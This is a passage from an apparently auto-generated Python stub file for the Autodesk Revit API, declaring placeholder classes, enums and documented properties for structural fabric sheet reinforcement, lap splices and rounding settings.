""" pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass CutByCover = None NotCutByCover = None value__ = None class FabricLapSplicePosition(Enum, IComparable, IFormattable, IConvertible): """ Fabric lap splice position in the fabric distribution enum FabricLapSplicePosition, values: Aligned (0), MajorHalfwayStagger (1), MajorPassingStagger (2), MinorHalfwayStagger (3), MinorPassingStagger (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Aligned = None MajorHalfwayStagger = None MajorPassingStagger = None MinorHalfwayStagger = None MinorPassingStagger = None value__ = None class FabricLocation(Enum, IComparable, IFormattable, IConvertible): """ Fabric location in the host enum FabricLocation, values: BottomOrInternal (1), TopOrExternal (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrInternal = None TopOrExternal = None value__ = None class FabricReinSpanSymbol(IndependentTag, IDisposable): """ Represents an instance of a Structural Fabric Reinforcement Symbol in Autodesk Revit. """ @staticmethod def Create(document, viewId, hostId, point, symbolId): """ Create(document: Document, viewId: ElementId, hostId: LinkElementId, point: XYZ, symbolId: ElementId) -> FabricReinSpanSymbol Places a new instance of the Structural Fabric Reinforcement Symbol into the project relative to a particular FabricSheet and View. document: The document. viewId: The id of the view in which the symbol should appear. hostId: The ElementId of FabricSheet (either in the document, or linked from another document). point: The span symbol's head position. symbolId: The id of the family symbol of this symbol. Returns: A reference to the newly-created symbol. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class ReinforcementRoundingManager(object, IDisposable): """ A base class providing access to reinforcement rounding overrides for structural elements. """ def Dispose(self): """ Dispose(self: ReinforcementRoundingManager) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementRoundingManager, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Element = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The owner of the reinforcement rounding overrides. Get: Element(self: ReinforcementRoundingManager) -> Element """ IsActiveOnElement = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines whether reinforcement rounding is activated for the particular element. Get: IsActiveOnElement(self: ReinforcementRoundingManager) -> bool Set: IsActiveOnElement(self: ReinforcementRoundingManager) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: ReinforcementRoundingManager) -> bool """ LengthDisplayUnit = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length units used when displaying the reinforcement rounding values. Get: LengthDisplayUnit(self: ReinforcementRoundingManager) -> DisplayUnitType """ class FabricRoundingManager(ReinforcementRoundingManager, IDisposable): """ Provides access to element reinforcement roundings overrides. """ def Dispose(self): """ Dispose(self: ReinforcementRoundingManager, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementRoundingManager, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApplicableReinforcementRoundingSource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the source of the rounding settings for this element. Get: ApplicableReinforcementRoundingSource(self: FabricRoundingManager) -> ReinforcementRoundingSource """ ApplicableSegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for fabric segments. Get: ApplicableSegmentLengthRounding(self: FabricRoundingManager) -> float """ ApplicableSegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for fabric segments. Get: ApplicableSegmentLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod """ ApplicableTotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for Cut Overall Length and Cut Overall Width parameters. Get: ApplicableTotalLengthRounding(self: FabricRoundingManager) -> float """ ApplicableTotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for Cut Overall Length and Cut Overall Width parameters. Get: ApplicableTotalLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod """ SegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for fabric segments. Get: SegmentLengthRounding(self: FabricRoundingManager) -> float Set: SegmentLengthRounding(self: FabricRoundingManager) = value """ SegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the segment length rounding method Get: SegmentLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod Set: SegmentLengthRoundingMethod(self: FabricRoundingManager) = value """ TotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for Cut Overall Length and Cut Overall Width parameters. Get: TotalLengthRounding(self: FabricRoundingManager) -> float Set: TotalLengthRounding(self: FabricRoundingManager) = value """ TotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the total length rounding method Get: TotalLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod Set: TotalLengthRoundingMethod(self: FabricRoundingManager) = value """ class FabricSheet(Element, IDisposable): """ An object that represents an Fabric Sheet Element within the Autodesk Revit project. """ @staticmethod def Create(document, *__args): """ Create(document: Document, hostElement: Element, fabricSheetTypeId: ElementId) -> FabricSheet Creates a new instance of a single flat Fabric Sheet element within the project. document: The document in which the fabric sheet is to be created. hostElement: The element that will host the FabricSheet. The host can be a Structural Floor, Structural Wall, Structural Slab, or a Part created from a structural layer belonging to one of those element types. fabricSheetTypeId: The id of the FabricSheetType. Returns: The newly created single Fabric Sheet instance. Create(document: Document, concreteHostElementId: ElementId, fabricSheetTypeId: ElementId, bendProfile: CurveLoop) -> FabricSheet Creates a new instance of a single bent Fabric Sheet element within the project. document: The document in which the fabric sheet is to be created. concreteHostElementId: The element that will host the FabricSheet. The host can be a Structural Floor, Structural Wall, Structural Slab, Structural Floor Edge, Structural Slab Edge, Structural Column, Beam and Brace. Also, host can be a Autodesk::Revit::DB::Part created from a structural layer of Structural Floor, Structural Wall or Structural Slab. fabricSheetTypeId: The id of the FabricSheetType. bendProfile: A profile that defines the bending shape of the fabric sheet. The profile can be provided without fillets (eg. for L shape, only two lines not two lines and one arc), if so, then fillets (in example one arc) will be automatically generated basing on the Bend Diameter parameter defined in the Fabric Wire system family. If the provided profile has no corners (has a tangent defined at each point except the ends), no fillets will be generated. The provided profile defines the center-curve of a wire. Returns: The instance of the newly created bent fabric sheet. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBendProfile(self): """ GetBendProfile(self: FabricSheet) -> CurveLoop Returns the profile (not including generated fillets) that defines the shape of the Fabric Sheet bending. Returns: The profile that defines the shape of the fabric sheet bending for bent fabric sheet, for flat fabric sheet ll will be returned. """ pass def GetBendProfileWithFillets(self): """ GetBendProfileWithFillets(self: FabricSheet) -> CurveLoop Returns the profile with generated fillets that defines the shape of the Fabric Sheet bending. Returns: The bend profile with generated fillets that defines the shape of the fabric sheet bending for bent fabric sheet, for flat fabric sheet ll will be returned. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: FabricSheet) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def GetSegmentParameterIdsAndLengths(self, rounded): """ GetSegmentParameterIdsAndLengths(self: FabricSheet, rounded: bool) -> IDictionary[ElementId, float] Returns the array of pairs [parameter ID, length] that correspond to segments of a bent fabric sheet (like A, B, C, D etc.). rounded: Set to true to return rounded values for segments lengths. Returns: Array of pairs [parameter ID, length] that correspond to segments of a bent fabric sheet (like A, B, C, D etc.) is returned for bend fabric sheet. For flat fabric sheet (not bent) empty array is returned. """ pass def GetSheetLocation(self): """ GetSheetLocation(self: FabricSheet) -> Transform Gets the position and the orientation of the Fabric Sheet instance. Returns: The location of the Fabric Sheet instance. """ pass def GetWireCenterlines(self, wireDirection=None): """ GetWireCenterlines(self: FabricSheet, wireDirection: WireDistributionDirection) -> IList[Curve] Gets a list of curves representing the wires centerlines of the Fabric Sheet. wireDirection: The direction of wire distribution in the Fabric Sheet. Returns: The centerline curves. GetWireCenterlines(self: FabricSheet) -> IList[Curve] Gets a list of curves representing the wires centerlines of the Fabric Sheet in the both distribution directions. Returns: The centerline curves. """ pass def IsCoverOffsetValid(self, coverOffset): """ IsCoverOffsetValid(self: FabricSheet, coverOffset: float) -> bool Identifies if the specified value is valid for use as a cover offset. coverOffset: The cover offset value. Returns: True if the value is valid, false if the value is invalid. """ pass def IsSingleFabricSheetWithinHost(self, hostElement, transform): """ IsSingleFabricSheetWithinHost(self: FabricSheet, hostElement: Element, transform: Transform) -> bool Identifies if the specified single Fabric Sheet position is within the host. hostElement: A structural element that will host the Fabric Sheet. transform: The transform that defines the placement of the instance single Fabric Sheet. Returns: True if the single Fabric Sheet instance is within the host, false if the single Fabric Sheet instance is out of host. """ pass @staticmethod def IsValidHost(*__args): """ IsValidHost(document: Document, concreteHostElementId: ElementId) -> bool Checks whether an element is a valid host for fabric sheet. document: The document. concreteHostElementId: The elementId to check. Returns: True if the element is a valid host for fabric sheet, false otherwise. IsValidHost(host: Element) -> bool Checks whether an element is a valid host for fabric sheet. host: The element to check. Returns: True if the element is a valid host for fabric sheet, false otherwise. """ pass def PlaceInHost(self, hostElement, transform): """ PlaceInHost(self: FabricSheet, hostElement: Element, transform: Transform) Inserts the single Fabric Sheet instance into the host element. hostElement: A structural element that will host the Fabric Sheet. The element must support fabric hosting. transform: The transform that defines the placement of the instance single Fabric Sheet. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetBendProfile(self, bendProfile): """ SetBendProfile(self: FabricSheet, bendProfile: CurveLoop) Sets new profile that defines the shape of the Fabric Sheet bending. bendProfile: A profile that defines the bending shape of the fabric sheet. The profile can be provided without fillets (eg. for L shape, only two lines not two lines and one arc), if so, then fillets (in example one arc) will be automatically generated basing on the Bend Diameter parameter defined in the Fabric Wire system family. If the provided profile has no corners (has a tangent defined at each point except the ends), no fillets will be generated. The provided profile defines the center-curve of a wire. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetSegmentLength(self, segmentParameterId, value): """ SetSegmentLength(self: FabricSheet, segmentParameterId: ElementId, value: float) Sets the value of the bent fabric sheet segment(like A, B, C, D etc.) segmentParameterId: The segment ID of the bent fabric sheet. value: The length value to set """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BendFinalLoopOrientationVector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Direction of local Fabric Sheet Y axis in bending polyline LCS. Get: BendFinalLoopOrientationVector(self: FabricSheet) -> XYZ """ BentFabricBendDirection = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies which wire direction of the fabric sheet is bent. Get: BentFabricBendDirection(self: FabricSheet) -> BentFabricBendDirection Set: BentFabricBendDirection(self: FabricSheet) = value """ BentFabricLongitudinalCutLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the cut length of the fabric sheet perpendicular to the bend edge. Get: BentFabricLongitudinalCutLength(self: FabricSheet) -> float Set: BentFabricLongitudinalCutLength(self: FabricSheet) = value """ BentFabricStraightWiresLocation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the location of straight bars with respect to bent bars in the fabric sheet. Get: BentFabricStraightWiresLocation(self: FabricSheet) -> BentFabricStraightWiresLocation Set: BentFabricStraightWiresLocation(self: FabricSheet) = value """ BentFabricWiresOrientation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the location of the straight bars in the fabric sheet. Get: BentFabricWiresOrientation(self: FabricSheet) -> BentFabricWiresOrientation Set: BentFabricWiresOrientation(self: FabricSheet) = value """ CoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The additional cover offset of the Fabric Sheet. Get: CoverOffset(self: FabricSheet) -> float Set: CoverOffset(self: FabricSheet) = value """ CutOverallLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet length after cutting has taken place. Get: CutOverallLength(self: FabricSheet) -> float """ CutOverallWidth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet length after cutting has taken place. Get: CutOverallWidth(self: FabricSheet) -> float """ CutSheetMass = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet mass after cutting has taken place. Get: CutSheetMass(self: FabricSheet) -> float """ FabricAreaOwnerId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Fabric Area Id. Get: FabricAreaOwnerId(self: FabricSheet) -> ElementId """ FabricHostReference = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Controls if Single Fabric Sheet should be cut by the Host Cover Get: FabricHostReference(self: FabricSheet) -> FabricHostReference Set: FabricHostReference(self: FabricSheet) = value """ FabricLocation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Fabric Sheet location in the host. Get: FabricLocation(self: FabricSheet) -> FabricLocation Set: FabricLocation(self: FabricSheet) = value """ FabricNumber = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the numerical parameter assigned to the fabric sheet and any sheet of the same type, dimension, material, shape, and partition. Get: FabricNumber(self: FabricSheet) -> str """ HostId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The structure element that contains the Fabric Sheet. Get: HostId(self: FabricSheet) -> ElementId """ IsBent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of fabric sheet. True for bent fabric sheet, false for flat fabric sheet. Get: IsBent(self: FabricSheet) -> bool """ SketchId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Sketch element for this element. Get: SketchId(self: FabricSheet) -> ElementId """ class FabricSheetAlignment(Enum, IComparable, IFormattable, IConvertible): """ Fabric Sheet alignment in the fabric distribution enum FabricSheetAlignment, values: BothEdges (3), EndingEdge (2), Null (0), StartingEdge (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BothEdges = None EndingEdge = None Null = None StartingEdge = None value__ = None class FabricSheetLayoutPattern(Enum, IComparable, IFormattable, IConvertible): """ The pattern for how the wires in Fabric Sheet are laid out. enum FabricSheetLayoutPattern, values: ActualSpacing (0), FixedNumber (1), MaximumSpacing (2), NumberWithSpacing (3), QuantitativeSpacing (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ActualSpacing = None FixedNumber = None MaximumSpacing = None NumberWithSpacing = None QuantitativeSpacing = None value__ = None class FabricSheetType(ElementType, IDisposable): """ Represents a fabric sheet type, used in the generation of fabric wires. """ @staticmethod def CreateDefaultFabricSheetType(ADoc): """ CreateDefaultFabricSheetType(ADoc: Document) -> ElementId Creates a new FabricSheetType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: FabricSheetType) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def GetWireItem(self, wireIndex, direction): """ GetWireItem(self: FabricSheetType, wireIndex: int, direction: WireDistributionDirection) -> FabricWireItem Gets the Wire stored in the FabricSheetType at the associated index. wireIndex: Item index in the Fabric Sheet direction: Wire distribution direction of the inquired item Returns: Fabric wire Item """ pass def IsCustom(self): """ IsCustom(self: FabricSheetType) -> bool Verifies if the type is Custom Fabric Sheet Returns: True if Layout is set on Custom and if the wireArr is not null """ pass def IsValidMajorLapSplice(self, majorLapSplice): """ IsValidMajorLapSplice(self: FabricSheetType, majorLapSplice: float) -> bool Identifies if the input value is valid to be applied as the major lap splice value for this FabricSheetType. """ pass def IsValidMinorLapSplice(self, minorLapSplice): """ IsValidMinorLapSplice(self: FabricSheetType, minorLapSplice: float) -> bool Identifies if the input value is valid to be applied as the minor lap splice value for this FabricSheetType. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetLayoutAsCustomPattern(self, minorStartOverhang, minorEndOverhang, majorStartOverhang, majorEndOverhang, minorFabricWireItems, majorFabricWireItems): """ SetLayoutAsCustomPattern(self: FabricSheetType, minorStartOverhang: float, minorEndOverhang: float, majorStartOverhang: float, majorEndOverhang: float, minorFabricWireItems: IList[FabricWireItem], majorFabricWireItems: IList[FabricWireItem]) """ pass def SetMajorLayoutAsActualSpacing(self, overallWidth, minorStartOverhang, spacing): """ SetMajorLayoutAsActualSpacing(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, spacing: float) Sets the major layout pattern as ActualSpacing, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. spacing: The distance between the wires in the major direction. """ pass def SetMajorLayoutAsFixedNumber(self, overallWidth, minorStartOverhang, minorEndOverhang, numberOfWires): """ SetMajorLayoutAsFixedNumber(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, minorEndOverhang: float, numberOfWires: int) Sets the major layout pattern as FixedNumber, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. minorEndOverhang: The distance from the last wire to the edge of the sheet in the minor direction. numberOfWires: The number of the wires to set in the major direction. """ pass def SetMajorLayoutAsMaximumSpacing(self, overallWidth, minorStartOverhang, minorEndOverhang, spacing): """ SetMajorLayoutAsMaximumSpacing(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, minorEndOverhang: float, spacing: float) Sets the major layout pattern as MaximumSpacing, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. minorEndOverhang: The distance from the last wire to the edge of the sheet in the minor direction. spacing: The distance between the wires in the major direction. """ pass def SetMajorLayoutAsNumberWithSpacing(self, overallWidth, minorStartOverhang, numberOfWires, spacing): """ SetMajorLayoutAsNumberWithSpacing(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, numberOfWires: int, spacing: float) Sets the major layout pattern as NumberWithSpacing, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. numberOfWires: The number of the wires to set in the major direction. spacing: The distance between the wires in the major direction. """ pass def SetMinorLayoutAsActualSpacing(self, overallLength, majorStartOverhang, spacing): """ SetMinorLayoutAsActualSpacing(self: FabricSheetType, overallLength: float, majorStartOverhang: float, spacing: float) Sets the minor layout pattern as ActualSpacing, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. spacing: The distance between the wires in the minor direction. """ pass def SetMinorLayoutAsFixedNumber(self, overallLength, majorStartOverhang, majorEndOverhang, numberOfWires): """ SetMinorLayoutAsFixedNumber(self: FabricSheetType, overallLength: float, majorStartOverhang: float, majorEndOverhang: float, numberOfWires: int) Sets the major layout pattern as FixedNumber, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. majorEndOverhang: The distance from the last wire to the edge of the sheet in the major direction. numberOfWires: The number of the wires to set in the minor direction. """ pass def SetMinorLayoutAsMaximumSpacing(self, overallLength, majorStartOverhang, majorEndOverhang, spacing): """ SetMinorLayoutAsMaximumSpacing(self: FabricSheetType, overallLength: float, majorStartOverhang: float, majorEndOverhang: float, spacing: float) Sets the major layout pattern as MaximumSpacing, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. majorEndOverhang: The distance from the last wire to the edge of the sheet in the major direction. spacing: The distance between the wires in the minor direction. """ pass def SetMinorLayoutAsNumberWithSpacing(self, overallLength, majorStartOverhang, numberOfWires, spacing): """ SetMinorLayoutAsNumberWithSpacing(self: FabricSheetType, overallLength: float, majorStartOverhang: float, numberOfWires: int, spacing: float) Sets the major layout pattern as NumberWithSpacing, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. numberOfWires: The number of wires in the minor direction. spacing: The distance between the wires in the minor direction. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass MajorDirectionWireType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FabricWireType to be used in the major direction. Get: MajorDirectionWireType(self: FabricSheetType) -> ElementId Set: MajorDirectionWireType(self: FabricSheetType) = value """ MajorEndOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the last wire (measured in the major direction). Get: MajorEndOverhang(self: FabricSheetType) -> float """ MajorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The lap splice length in the major direction. Get: MajorLapSpliceLength(self: FabricSheetType) -> float Set: MajorLapSpliceLength(self: FabricSheetType) = value """ MajorLayoutPattern = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The layout pattern in the major direction. Get: MajorLayoutPattern(self: FabricSheetType) -> FabricSheetLayoutPattern """ MajorNumberOfWires = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of wires used in the major direction (includes the first and last wires). Get: MajorNumberOfWires(self: FabricSheetType) -> int """ MajorReinforcementArea = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The area of fabric divided by the spacing of the wire in the major direction. Get: MajorReinforcementArea(self: FabricSheetType) -> float """ MajorSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The spacing between the wires in the major direction (not including the overhangs). Get: MajorSpacing(self: FabricSheetType) -> float """ MajorStartOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the first wire (measured in the major direction). Get: MajorStartOverhang(self: FabricSheetType) -> float """ Material = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the material assigned to wires. Get: Material(self: FabricSheetType) -> ElementId Set: Material(self: FabricSheetType) = value """ MinorDirectionWireType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FabricWireType to be used in the minor direction. Get: MinorDirectionWireType(self: FabricSheetType) -> ElementId Set: MinorDirectionWireType(self: FabricSheetType) = value """ MinorEndOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the last wire (measured in the minor direction). Get: MinorEndOverhang(self: FabricSheetType) -> float """ MinorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The lap splice length in the minor direction. Get: MinorLapSpliceLength(self: FabricSheetType) -> float Set: MinorLapSpliceLength(self: FabricSheetType) = value """ MinorLayoutPattern = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The layout pattern in the minor direction. Get: MinorLayoutPattern(self: FabricSheetType) -> FabricSheetLayoutPattern """ MinorNumberOfWires = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of wires used in the minor direction (includes the 1st and last wires). Get: MinorNumberOfWires(self: FabricSheetType) -> int """ MinorReinforcementArea = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The area of fabric divided by the spacing of the wire in the minor direction. Get: MinorReinforcementArea(self: FabricSheetType) -> float """ MinorSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The spacing between the wires in the minor direction (not including the overhangs). Get: MinorSpacing(self: FabricSheetType) -> float """ MinorStartOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the first wire (measured in the minor direction). Get: MinorStartOverhang(self: FabricSheetType) -> float """ OverallLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of the wire sheet (including overhangs) in the major direction. Get: OverallLength(self: FabricSheetType) -> float """ 